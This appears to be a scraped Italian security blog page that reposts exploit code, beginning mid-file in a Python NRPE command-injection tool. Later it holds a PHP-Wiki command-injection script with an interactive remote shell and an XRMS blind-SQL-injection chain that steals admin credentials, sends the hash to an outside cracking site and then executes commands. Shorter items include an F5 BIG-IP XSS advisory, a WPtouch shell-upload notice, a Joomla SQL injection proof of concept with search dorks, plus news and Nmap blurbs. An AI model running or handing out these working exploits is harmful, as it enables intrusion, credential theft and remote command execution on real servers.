             0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c,
             0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713,
             0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b,
             0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242,
             0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1,
             0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c,
             0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278,
             0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7,
             0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66,
             0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,
             0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605,
             0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8,
             0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b,
             0x2d02ef8d)
 
    def __str__(self):
        # Turn whatever string data we have into a null terminated string
        if len(self.sData) < MAX_PACKETBUFFER_LENGTH:
            sData = self.sData + "\0" * (MAX_PACKETBUFFER_LENGTH - len(self.sData))
            sData += "SR" # not sure about this, from perl
        elif len(self.sData) == MAX_PACKETBUFFER_LENGTH + 2:
            sData = self.sData
        else:
            raise ValueError("CHECK_NRPE: invalid input")
        # Return a string that equals the C struct, not something printable
        return struct.pack("!hhLh" + str(len(sData)) + "s", self.nPacketVersion,
            self.nPacketType, self.nCRC32, self.nResultCode, sData)
 
    def __len__(self):
        return len(self.__str__())
 
    def dumpself(self):
        """Debugging output for self as C structure.
 
        Not normally used."""
        sElf = self.__str__()
        sPrev = sElf[0:1]
        nCount = 0
        ii = -1
        for sChar in sElf[1:]:
            ii += 1
            if sChar == sPrev:
                nCount += 1
                continue
            if nCount:
                print "%d\t%d *" % (ii - nCount, nCount + 1),
                nCount = 0
            else:
                print "%d\t" % ii,
            print "\t'%s' (%d)" % (sPrev, ord(sPrev))
            sPrev = sChar
        print "%d\t\t'%s' (%d)" % (ii + 1, sPrev, ord(sPrev))
 
    def calculate_crc32(self):
        """Calculate the CRC32 value for the string version of self."""
        nCRC = 0xFFFFFFFF
        for ii in self.__str__():
            nIndex = (nCRC ^ ord(ii)) & 0xFF
            nCRC = ((nCRC >> 8) & 0x00FFFFFF) ^ self.tCRC32[nIndex]
        self.nCRC32 = nCRC ^ 0xFFFFFFFF
        #debug("DataPacket.calculate_crc32 = %d" % self.nCRC32)
 
    def extract(self, sQuery):
        """Turn a string into the DataPacket attributes."""
        #debug("DataPacket.extract(%d)" % len(sQuery))
        tVals = struct.unpack("!hhLh" + str(len(sQuery) - 10) + "s", sQuery)
        self.nPacketVersion = tVals[0]
        self.nPacketType = tVals[1]
        self.nCRC32 = tVals[2]
        self.nResultCode = tVals[3]
        self.sData = tVals[4]
 
m_nTimeout = 0
def alarm_handler(nSignum, oFrame):
    """Timeout catcher"""
    raise KeyboardInterrupt("CHECK_NRPE: Socket timeout after %d seconds." %
        m_nTimeout)
 
 
class NrpeClient(DataPacket):
    """Everything needed to send a message to an NRPE server and get data back.
    """
    def __init__(self, server_name, server_port=5666, use_ssl=True, timeout=10,
                 packet_version=NRPE_PACKET_VERSION_2):
        DataPacket.__init__(self, packet_version, QUERY_PACKET)
        self.sServer = server_name
        self.nPort = server_port
        self.bUseSSL = use_ssl
        self.nTimeout = timeout
 
    def run_query(self, sQuery):
        """Connect to the NRPE server, send the query and get back data.
        """
        # initialize alarm signal handling and set timeout
        signal.signal(signal.SIGALRM, alarm_handler)
        signal.alarm(self.nTimeout)
 
        # try to connect to the host at the given port number
        oSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # do SSL handshake
        if self.bUseSSL:
            oContext = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)
            oContext.set_cipher_list('ADH')
            oConnection = OpenSSL.SSL.Connection(oContext, oSocket)
        else:
            oConnection = oSocket
 
        oConnection.connect((self.sServer, self.nPort))
 
        # we're connected and ready to go
        self.sData = sQuery
        self.nCRC32 = 0
        self.calculate_crc32()
 
        # send the packet
        oConnection.send(str(self))
 
        # wait for the response packet
        sRval = oConnection.recv(len(self))
 
        # close the connection
        if self.bUseSSL and not oConnection.shutdown():
            try:
                sRval += oConnection.recv(len(self))
            except OpenSSL.SSL.ZeroReturnError:
                pass
        oSocket.close()
        del oSocket, oConnection
        if self.bUseSSL:
            del oContext
 
        # reset timeout
        signal.alarm(0)
 
        if len(sRval) == 0:
            raise IOError("CHECK_NRPE: Received 0 bytes from daemon." +
                "Check the remote server logs for error messages.")
        elif len(sRval) < len(self):
            raise IOError("CHECK_NRPE: Receive underflow - only " +
                "%d bytes received (%d expected)." % (len(sRval), len(self)))
 
        # Become the received data
        self.extract(sRval)
 
        # check the crc 32 value
        nRvalCRC = self.nCRC32
        self.nCRC32 = 0
        self.calculate_crc32()
        if nRvalCRC != self.nCRC32:
            raise ValueError("CHECK_NRPE: Response packet had invalid CRC32.")
 
        # check packet version
        if self.nPacketVersion != NRPE_PACKET_VERSION_2:
            raise ValueError("CHECK_NRPE: Invalid packet version received from server.")
 
        # check packet type
        if self.nPacketType != RESPONSE_PACKET:
            raise ValueError("CHECK_NRPE: Invalid packet type received from server.")
 
        # Turn the input data into a proper python string (chop at first NULL)
        for ii in range(len(self.sData)):
            if self.sData[ii] == "\0":
                break
        self.sData = self.sData[0:ii]
 
 
if __name__ == '__main__':
    m_oOpts = optparse.OptionParser("%prog -H Host_or_IP -c nrpe_command --cmd=\"command to execute\" [-b, --brute] [-n] [-p PORT] [--timeout sec] [--list]")
    m_oOpts.add_option('--host', '-H', action='store', type='string',
        help='The address of the host running the NRPE daemon (required)')
    m_oOpts.add_option('--ssl', '-n', action='store_false', default=True,
        help='Do no use SSL')
    m_oOpts.add_option('--port', '-p', action='store', type='int', default=5666,
        help='The port on which the daemon is running (default=5666)')
    m_oOpts.add_option('--timeout', '-t', action='store', type='int',
        default=10,
        help='Number of seconds before connection times out (default=10)')
    m_oOpts.add_option('--command', '-c', action='store', type='string',
        #default='get_data',
        help='The name of nrpe command')
    m_oOpts.add_option('--brute', '-b', action='store_true', default=False,
        help='Find existing nrpe command from list [ -list ]')
    m_oOpts.add_option('--list', action='store_true',  default=False,
        help='Show NRPE Command list')
    m_oOpts.add_option('--cmd', action='store', type='string',
        help='Command to execute on the remote server')
 
    m_oOptions, m_lArgs = m_oOpts.parse_args()
    m_nTimeout = m_oOptions.timeout
    m_sQuery = m_oOptions.command
    m_gList = m_oOptions.list
    m_sBrute = m_oOptions.brute
 
    print (banner)
 
    if m_gList:
        print('[+] NRPE Command list\n')
        for LinesPluginList in PluginList:
            print(LinesPluginList)
        sys.exit(0)
    elif m_sQuery and m_sBrute:
        print m_oOpts.format_help()
        print('[!]')
        print('[!] ERROR: Select only -c OR -b option\n')
        sys.exit(0)
    elif not m_oOptions.host or not m_oOptions.cmd:
        print m_oOpts.format_help()
        sys.exit(0)
 
    print('[+] Target: '+m_oOptions.host)
    print('[+] Command: '+m_oOptions.cmd+' \n')
 
    if m_sBrute:
        print('[+] Brute force Mode....')
        print('[+]')
        for LinesPluginList in PluginList:
 
                m_CommandQuery = ""
                m_CommandQuery += ' ' + m_oOptions.cmd
                if m_lArgs:
                        m_CommandQuery += ' ' + ' '.join(m_lArgs)
 
                m_sQuery = LinesPluginList+'!'+str(evilchar)+str(m_CommandQuery)+' #'
 
 
                m_oNRPE = NrpeClient(m_oOptions.host, m_oOptions.port, m_oOptions.ssl,
                        m_oOptions.timeout)
                try:
                        m_oNRPE.run_query(m_sQuery)
                except socket.error:
                        print('[!] Connection Error!')
                        sys.exit(1)
                except OpenSSL.SSL.ZeroReturnError:
                        print('[!] Not Vulnerable')
                        print('[!] Option dont_blame_nrpe disabled or service fixed')
                        sys.exit(1)
 
                if m_oNRPE.sData[-11:] == "not defined":
                        print('[-] Checking for NRPE command '+LinesPluginList+':\t\t\tnot found')
                else:
                        print('[+] Checking for NRPE command '+LinesPluginList+':\t\t\tVULNERABLE!')
                        print('[+]')
                        print('[+] Max Output CHAR 1024 (According to NRPE <= 2.15 specifications)')
                        print('[+]')
                        print('[+] Please ignore NRPE plugin command messages (Usage or Errors)')
                        print('[+]')
                        print(m_oNRPE.sData)
                        sys.exit(0)
    elif m_sQuery:
        print('[+] Custom command Mode....')
        print('[+]')
        print('[+] Connecting......')
 
        m_CommandQuery = ""
        m_CommandQuery += ' ' + m_oOptions.cmd
        if m_lArgs:
                m_CommandQuery += ' ' + ' '.join(m_lArgs)
 
        m_sQuery = m_sQuery+'!'+str(evilchar)+str(m_CommandQuery)+' #'
 
        m_oNRPE = NrpeClient(m_oOptions.host, m_oOptions.port, m_oOptions.ssl,
                m_oOptions.timeout)
        try:
               m_oNRPE.run_query(m_sQuery)
        except KeyboardInterrupt:
                print("[!] CHECK_NRPE: Socket timeout after %d seconds." % m_nTimeout)
                sys.exit(1)
        except socket.error:
                print('[!] Connection Error!')
                sys.exit(1)
        except OpenSSL.SSL.ZeroReturnError:
                print('[!] Not Vulnerable')
                print('[!] Option dont_blame_nrpe disabled or service fixed')
                sys.exit(1)
 
        if m_oNRPE.sData[-11:] == "not defined":
                print('[-] Checking for NRPE command '+m_oOptions.command+': not found...try other NRPE command')
        else:
                print('[+] Checking for NRPE command '+m_oOptions.command+': VULNERABLE!')
                print('[+]')
                print('[+] Max Output CHAR 1024 (According to NRPE <= 2.15 specifications)')
                print('[+]')
                print('[+] Please ignore NRPE plugin command messages (Usage or Errors)')
                print('[+]')
                print(m_oNRPE.sData)
                sys.exit(0)

(25)

29Aug/140

Un italiano su tre aggira le restrizioni Internet sul lavoro

Una ricerca OnePoll rileva che i numerosi dipendenti italiani, nonostante le regole aziendali, accedono dal lavoro a Facebook, utilizzano le app e la messaggistica.

Per i CIO non una bella notizia. Secondo i dati di una ricerca OnePoll per Samsung, infatti, un italiano su tre (32 per cento) aggira le restrizioni d’accesso a Internet (Facebook, app e messaggistica) imposte dalla propria azienda sul luogo di lavoro.
E se guardiamo la fascia di età fra i 18 e i 34 anni il dato sale al 49 per cento.

Se da una parte questo significa un miglioramento delle competenze informatiche, dall’altra è un dato che dovrebbe preoccupare i responsabili dei sistemi informativi aziendali.
Toccherà a loro riparare gli eventuali danni dell’aggiramento delle policy. Il 26 per cento tende a ignorare o ad aggirare le restrizioni usando i dispositivi personali per Twitter, il 29 per cento per servizi di video streaming, il 34 per cento per applicazioni d’archiviazione sul cloud e il 38 per cento per le app mobile.

L’indagine di Samsung che ha coinvolto 4.500 persone in sette Paesi europei (Italia, Gran Bretagna, Germania, Francia, Spagna, Belgio e Olanda) rivela che nonostante in Europa l’accesso a Facebook sia limitato o addirittura vietato al 40 per cento dei dipendenti, sono in molti a ignorare o aggirare le regole: il 34 per cento in Germania, il 32 per cento in Spagna, il 31 per cento in Belgio e Olanda.

I più indisciplinati sono gli inglesi (41 per cento), mentre i francesi (20 per cento) si distinguono per il rispetto delle norme aziendali. Il settore di mercato europeo in cui limiti e divieti sono più frequenti è l’alberghiero. Il 47 per cento delle aziende ha delle regole in materia, ma il 38 per cento del personale le infrange, un dato inferiore solo al 46 per cento degli indisciplinati che si trovano nel settore immobiliare.

”Dal punto di vista della sicurezza, è comprensibile che i datori di lavoro vogliano controllare l’uso della tecnologia da parte dei propri dipendenti”, commenta Dimitrios Tsivrikos, Consumer and Business Psychologist allo University College London. ‘‘Se però questo si traduce nell’ignorare le esigenze del professionista moderno, le aziende potrebbero andare incontro a un calo di produttività e di coinvolgimento”. (L. F.)

Fonte: http://www.cwi.it/un-italiano-su-tre-aggira-le-restrizioni-internet-sul-lavoro-21217
(148)

28Aug/140

PHP-Wiki Command Injection

###############################################################
#    ____                    __                  _ __   _ 
#   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)
#  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / 
# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  
#/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   
#             /_/ /_/         /_/                     
# Diskovered in Nov/Dec 2011
###############################################################
 
import urllib
import urllib2
import sys
def banner():
	print "	    ____                    __                  _ __   _ "
	print "	   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)"
	print "	  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / "
	print "	 / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  "
	print "	/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   "
	print "	             /_/ /_/         /_/                     \n"
 
 
def usage():
	banner()
	print "	[+] Usage example"
	print "	[-] python " + sys.argv[0] + " http://path.to/wiki"
 
if len(sys.argv)< 2:
	usage()
	quit()
 
domain = sys.argv[1]
def commandexec(cmd):
	data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')])
	cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)
	cmd2 = urllib2.urlopen(cmd1)
	output = cmd2.read()
	firstloc = output.find("123:::\n") + len("123:::\n")
	secondloc = output.find("\n:::123")
	return output[firstloc:secondloc]
 
 
banner()
print commandexec('uname -a')
print commandexec('id')
while(quit != 1):
	cmd = raw_input('Run a command: ')
	if cmd == 'quit':
		print "[-] Hope you had fun :)"
		quit = 1
	if cmd != 'quit':
		print commandexec(cmd)

(38)

28Aug/140

XRMS Blind SQL Injection / Command Execution

#######################
# XRMS Blind SQLi via $_SESSION poisoning, then command exec
#########################
 
import urllib
import urllib2
import time
import sys
 
usercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']
userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]
def banner():
  print """      ____                                      
     / __/_  ______ _  _  ___________ ___  _____
    / /_/ / / / __ `/ | |/_/ ___/ __ `__ \/ ___/
   / __/ /_/ / /_/ / _>  </ /  / / / / / (__  ) 
  /_/  \__,_/\__, (_)_/|_/_/  /_/ /_/ /_/____/  
               /_/                              
  [+] fuq th3 w0rld, fuq ur m0m!\n"""
 
def usage():
  print "  [+] Info: Remote Command Execution via $_SESSION poisoning to SQLi to RCE"
  print "  [+] Example:"
  print "  [+] python " + sys.argv[0] + " domain.to/xrms"
  quit()
 
def sendhashaway(hash):
  print " [+] Sending hash to icrackhash.com to be cracked."
  data = None
  headers = { 'Referer' : 'http://icrackhash.com/?mdhash=' + hash + '&type=MD5','User-Agent' : 'Mozilla','X-Requested-With' : 'XMLHttpRequest'}
  url = 'http://www.icrackhash.com/?mdhash=' + hash + '&type=MD5'
  gh = urllib2.Request(url,data,headers)
  gh2 = urllib2.urlopen(gh)
  output = gh2.read()
  plaintext = getpositions(output,'<td><small><strong>','</strong>')
  print " [-] Plaintext of hash: " +plaintext + "\n"
  return plaintext
 
def username(length):
  length = length + 1
  duser = []
  #1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(username,"
  payload2 = ",1)=CHAR("
  payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
        for i in range(1,length):
    found = 0
    while(found != 1):
      for f in range(0,len(userascii)):
        class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
          def http_error_302(self, req, fp, code, msg, headers):
            infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
            infourl.status = code
            infourl.code = code
            return infourl
          http_error_300 = http_error_302    
        class HeadRequest(urllib2.Request):
          def get_method(self):
            return "POST"
        payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
        data = urllib.urlencode([('user_id',payload)])
        url = 'http://'+domain+'/plugins/webform/new-form.php'
        opener = urllib2.build_opener(LeHTTPRedirectHandler)
        req = HeadRequest(url,data)
        prepare = opener.open(req)
        cookie1 = prepare.info()
        cookie2pos1 = str(cookie1).find('PHPSESSID')
        cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
        line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
        line = 'XRMS' + line[9:]
        url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
        headers = { 'Cookie' : line }
        data = None
        start = time.time()
        get = urllib2.Request(url,data,headers)
        get.get_method = lambda: 'HEAD'
        try:
          execute = urllib2.urlopen(get)
        except:
          pass
        elapsed = (time.time() - start)
        if(elapsed > 1):
          print "  Character found. Character is: " + usercharac[f]
          duser.append(usercharac[f])
          found = 1
  return duser
 
def getusernamelength():
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(LENGTH(username) = '"
  payload2 = "',BENCHMARK(50000000,MD5(0x34343434)),NULL) FROM users-- -"
  while (found != 1): 
    class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
      def http_error_302(self, req, fp, code, msg, headers):
        infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
        infourl.status = code
        infourl.code = code
        return infourl
      http_error_300 = http_error_302    
    class HeadRequest(urllib2.Request):
      def get_method(self):
        return "POST"
    payload = payload1 + str(i) + payload2
    data = urllib.urlencode([('user_id',payload)])
    url = 'http://'+domain+'/plugins/webform/new-form.php'
    opener = urllib2.build_opener(LeHTTPRedirectHandler)
    req = HeadRequest(url,data)
    prepare = opener.open(req)
    cookie1 = prepare.info()
    cookie2pos1 = str(cookie1).find('PHPSESSID')
    cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
    line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
    line = 'XRMS' + line[9:]
    url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
    headers = { 'Cookie' : line }
    data = None
    start = time.time()
    get = urllib2.Request(url,data,headers)
    get.get_method = lambda: 'HEAD'
    try:
      execute = urllib2.urlopen(get)
    except:
      pass
    elapsed = (time.time() - start)
    if(elapsed > 1):
      print "  Length found at position: " + str(i)
      found = 1
      length = i
      return length
    i = i + 1
 
def password(length):
  length = length + 1
  dpassword = []
  #1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(password,"
  payload2 = ",1)=CHAR("
  payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
        for i in range(1,length):
    found = 0
    while(found != 1):
      for f in range(0,len(userascii)):
        class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
          def http_error_302(self, req, fp, code, msg, headers):
            infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
            infourl.status = code
            infourl.code = code
            return infourl
          http_error_300 = http_error_302    
        class HeadRequest(urllib2.Request):
          def get_method(self):
            return "POST"
        payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
        data = urllib.urlencode([('user_id',payload)])
        url = 'http://'+domain+'/plugins/webform/new-form.php'
        opener = urllib2.build_opener(LeHTTPRedirectHandler)
        req = HeadRequest(url,data)
        prepare = opener.open(req)
        cookie1 = prepare.info()
        cookie2pos1 = str(cookie1).find('PHPSESSID')
        cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
        line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
        line = 'XRMS' + line[9:]
        url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
        headers = { 'Cookie' : line }
        data = None
        start = time.time()
        get = urllib2.Request(url,data,headers)
        get.get_method = lambda: 'HEAD'
        try:
          execute = urllib2.urlopen(get)
        except:
          pass
        elapsed = (time.time() - start)
        if(elapsed > 1):
          print "  Character found. Character is: " + usercharac[f]
          dpassword.append(usercharac[f])
          found = 1
  return dpassword
 
def login(domain,user,password):
  cookie = "XRMS=iseeurgettinown4d"
  url = 'http://'+domain+'/login-2.php'
  headers = { 'Cookie' : cookie }
  data = urllib.urlencode([('username',user),('password',password)])
  a1 = urllib2.Request(url,data,headers)
  a2 = urllib2.urlopen(a1)
  output = a2.read()
  if output.find('PEAR.php') > 0:
    print "  [+] Logged In"
 
def commandexec(domain,command):
  cookie = "XRMS=iseeurgettinown4d"
  cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)])
  headers = { 'Cookie' : cookie }
  data = None
  url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd
  b1 = urllib2.Request(url,data,headers)
  b2 = urllib2.urlopen(a1)
  output = b2.read()
  first = output.find('0x41') + 4
  last = output.find('14x0') - 4
  return output[first:last]
 
banner()
if len(sys.argv) < 2:
  usage()
domain = sys.argv[1]
print "  [+] Grabbing username length"
length = getusernamelength()
print "  [+] Grabbing username characters"
tmpuser = username(length)
adminusr = "".join(tmpuser)
print "  [+] Grabbing password hash"
tmppass =  password(32)
admpass = "".join(tmppass)
print " [+] Admin username: "+ adminusr
print "  [+] Admin password hash: " + admpass
plain = sendhashaway(admpass)
login(domain,adminusr,plain)
while(quit != 1):
  cmd = raw_input('  [+] Run a command: ')
  if cmd == 'quit':
    print "  [-] Hope you had fun :)"
    quit = 1
  if cmd != 'quit':
    print "  [+] "+ commandexec(domain,cmd)

(376)

28Aug/140

F5 BIG-IP 11.5.1 Cross Site Scripting

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
SEC Consult Vulnerability Lab Security Advisory < 20140828-0 >
=======================================================================
              title: Reflected Cross-Site Scripting
            product: F5 BIG-IP
 vulnerable version: <= 11.5.1
      fixed version: > 11.6.0
             impact: Medium
         CVE number: CVE-2014-4023
           homepage: https://f5.com/
              found: 2014-07-07
                 by: Stefan Viehböck
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================
 
Vendor/product description:
- -----------------------------
"The BIG-IP product suite is a system of application delivery services that
work together on the same best-in-class hardware platform or software virtual
instance.  From load balancing and service offloading to acceleration and
security, the BIG-IP system delivers agility—and ensures your applications
are fast, secure, and available."
 
URL: https://f5.com/products/big-ip
 
 
Vulnerability overview/description:
- -----------------------------------
BIG-IP suffers from a reflected Cross-Site Scripting vulnerability,
which allow an attacker to steal other users sessions, to impersonate other
users and to gain unauthorized access to the admin interface.
 
 
Proof of concept:
- -----------------
The following HTTP request triggers the vulnerability:
 
POST /tmui/dashboard/echo.jsp HTTP/1.1
Host: BIGIP
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 29
 
<script>alert('xss')</script>
 
The server does not properly encode user supplied information and returns it
to the user resulting in Cross-Site Scripting.
 
 
Vulnerable / tested versions:
- -----------------------------
More information can be found at:
https://support.f5.com/kb/en-us/solutions/public/15000/500/sol15532.html
 
 
Vendor contact timeline:
- ------------------------
2014-07-08: Sending advisory and proof of concept exploit via encrypted
            channel.
2014-07-09: Vendor confirms receipt of advisory. States that fix will be
            released in the "next 6 weeks or so"
2014-07-24: Vendor provides CVE: CVE-2014-4023
2014-08-26: Vendor releases fixed version.
2014-08-28: SEC Consult releases a coordinated security advisory.
 
 
Solution:
- ---------
Update to the newest version.
 
More information can be found at:
https://support.f5.com/kb/en-us/solutions/public/15000/500/sol15532.html
 
 
Workaround:
- -----------
No workaround available.
 
 
Advisory URL:
- -------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
 
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
 
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone:   +43 1 8903043 0
Fax:     +43 1 8903043 15
 
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
 
Interested in working with the experts of SEC Consult?
Write to career@sec-consult.com
 
EOF Stefan Viehböck / @2014

(52)

27Aug/140

Nmap Port Scanner 6.47

nmap port scanner matrix

Nmap is a utility for port scanning large networks, although it works fine for single hosts. Sometimes you need speed, other times you may need stealth.

In some cases, bypassing firewalls may be required. Not to mention the fact that you may want to scan different protocols (UDP, TCP, ICMP, etc.).

Nmap supports Vanilla TCP connect() scanning, TCP SYN (half open) scanning, TCP FIN, Xmas, or NULL (stealth) scanning, TCP ftp proxy (bounce attack) scanning, SYN/FIN scanning using IP fragments (bypasses some packet filters), TCP ACK and Window scanning, UDP raw ICMP port unreachable scanning, ICMP scanning (ping-sweep), TCP Ping scanning, Direct (non portmapper) RPC scanning, Remote OS Identification by TCP/IP Fingerprinting, and Reverse-ident scanning.

Nmap also supports a number of performance and reliability features such as dynamic delay time calculations, packet timeout and retransmission, parallel port scanning, detection of down hosts via parallel pings.

Fonte: http://packetstormsecurity.com/files/128000/Nmap-Port-Scanner-6.47.html

(60)

27Aug/140

WordPress WPtouch Mobile 3.4.5 Shell Upload

Wordpress WPtouch Mobile Plugin File Upload Vulnerability
 
=================================
 
 
====================
        ______               ___/  /  /                                /  /
       /  /  /___  ____  ___/__   /  /  ____  ____  _______  ____  ___/  /
   :  /  /  /    \/__  \/  /  /  /    \/    \/    \/  /    \/    \/     /
   | /  /  /  /  /     /  /  /  /  /  /  /  /  /__/  /  /__/  /  /  /  /
 --X-- /  /  /  /  /  /  /  /  /  /  /  /  /  /  /  /__   /   __/  /  /
   |\____/__/__/\____/\____/__/__/__/\____/__/  /__/  /  /\____/\____/
   :                   ____                        \____/:
                      /    \____  ____  ____  ____  ____ |
                     /  /  /    \/    \/    \/    \/   --X--
 Don Tukulesto      /     /  /__/  /__/  /  /  /__/  /__/| 
                   /  /  /  /  /  /  /   __/__   /__   / :
                  /__/__/\____/\____/\____/  /  /  /  /
                   www.indonesiancoder.com\____/\____/                                    
                       73 78 68 79 78 69 83 73 65 78  67 79 68 69 82
 
 
 
Found by  : k4L0ng666 (k4L0ng666@indonesiancoder.com)
 
Submited by  : Don Tukulesto (root@indonesiancoder.com)
 
Homepage  : http://indonesiancoder.com
 
Published  : August 26, 2014
 
Tested On  : OS X 10.9.4
 
=================================
 
 
====================
 
==================
| Software Info |==================
 
 
 
[>] Download      : http://downloads.wordpress.org/plugin/wptouch.3.4.5.zip
 
[>] Software      : WPtouch Mobile Plugin - Wordpress Plugin
 
[>] Plugin Version  : 3.4.5
 
[>] Vulnerability  : File upload
 
 
 
I. Proof of Concept
 
=================================
 
 
====================
You can execute any .php code into uploader, then you can find the backdoor at /wp-content/wptouch-data/
 
 
 
See Image below
 
II. Vendor patch
 
=================================
 
 
====================
Currently manufacturers do not provide patches or upgrades. 
Because it’s the new version. \m/
 
 
=================================
 
 
====================
 
WE ARE ONE UNITY, WE ARE A CODER FAMILY AND WE ARE INDONESIAN CODER
 
 
 
[>] Malang Cyber Crew ~ Magelang Cyber ~ Exploit-ID ~ Kill-9 Crew ~ Jatimcom
 
 
 
 
“People should not be afraid of their governments. Goverments should be afraid of their people.” -V
 
 
“Knowledge, like air, is vital to life. Like air, no one should be denied it.” 
 
~(^_^)~
=================================

(119)

27Aug/140

Joomla Spider 2.8.3 SQL Injection

######################
# Exploit Title : Joomla Spider video player 2.8.3 SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://web-dorado.com/
 
# Software Link : http://extensions.joomla.org/extensions/multimedia/multimedia-players/video-players-a-gallery/22321
 
# Dork Google: inurl:/component/spidervideoplayer
               inurl:option=com_spidervideoplayer    
 
# Date : 2014-08-26
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
 
 
 
######################
 
# PoC Exploit:
 
http://localhost/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1'
 
"theme" variable is not sanitized.
 
#####################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################

(78)